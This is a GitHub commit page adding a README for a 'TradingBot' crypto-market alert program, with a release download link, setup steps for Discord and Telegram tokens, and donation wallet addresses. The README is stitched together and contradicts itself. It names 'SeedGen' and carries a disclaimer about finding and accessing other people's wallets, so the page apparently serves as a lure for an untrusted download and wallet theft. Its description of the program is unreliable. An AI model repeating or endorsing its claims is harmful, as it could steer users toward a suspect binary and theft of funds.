-
Notifications
You must be signed in to change notification settings - Fork 85
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
1 changed file
with
58 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,58 @@ | ||
# About the program | ||
|
||
TradingBot is a special program for assistance and automation in cryptocurrency trading. | ||
The program cyclically analyzes the market and sends interesting information to you via discord or telegram. | ||
Thanks to this trader, there is no need to do routine things, such as searching for important news or monitoring cryptocurrency prices. | ||
This tool is also suitable for scalpers who need to track rapid price changes or monitor whale transactions. | ||
|
||
|
||
<p align="center"> [download](/releases/tag/tradingbot) | ||
<br> | ||
<hr style="border-radius: 2%; margin-top: 45px; margin-bottom: 50px;" noshade="" size="20" width="98%"> | ||
</p> | ||
|
||
# Features | ||
|
||
- Looking for large and rapid changes in the price of a cryptocurrency | ||
- Parsing new important news from well-known sites | ||
- Viewing signals from different sources | ||
- Tracking new transactions of “whales” of different cryptocurrencies | ||
|
||
|
||
# Usage | ||
|
||
## Setting | ||
Before starting to analyze the rank with the program, select where you want to receive messages from the bot, Discord or Telegram. | ||
1. For Discord, you will need to create your own server and a special hook with which you will receive messages ([Instructions](https://github.com](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks))) | ||
2. For Telegram you will need to [create your own telegram bot](https://core.telegram.org/bots#how-do-i-create-a-bot), and enter its token and your chat id in the program | ||
If you chose discord, enter “1” in the console, and if telegram, then “2”. | ||
|
||
![menu](/assets/menu.png) | ||
|
||
## Getting started | ||
After entering the data, press Y to start working. The program will begin analyzing the market and will send you information in the settings you specified. | ||
The settings will be saved to the settings.txt file. | ||
|
||
![work](/assets/work.png) | ||
|
||
## Example of incoming data to discord | ||
![work2](/assets/work2.png) | ||
|
||
|
||
# Source Code | ||
It is an open source program written in C++. Anyone can study the code and compile the program themselves. | ||
|
||
# Contributing | ||
|
||
I welcome contributions to improve SeedGen. Feel free to submit pull requests, report issues, or suggest new features. | ||
|
||
# Disclaimer | ||
This program is provided for educational purposes only. Using this program to access wallets that do not belong to you may be illegal and unethical. The creator of this program is not responsible for your decisions and damage caused to the wallets found with the help of this program. I do not recommend interacting with found wallets that are currently active. | ||
|
||
# License | ||
|
||
# Author support | ||
If this program was useful for you or you found a good balance and want to thank me, my crypto wallet addresses: \ | ||
BTC - bc1qejv7wcc99uzumpqnphtt8hc7vrm5pw68v0just \ | ||
LTC - ltc1qf6vtxsfhudkq7jfylpfhfv9fsncya35de9fzgr \ | ||
ETH - 0xe6A3d55396968B0257Ee0e13D7c41719832cf8E2 |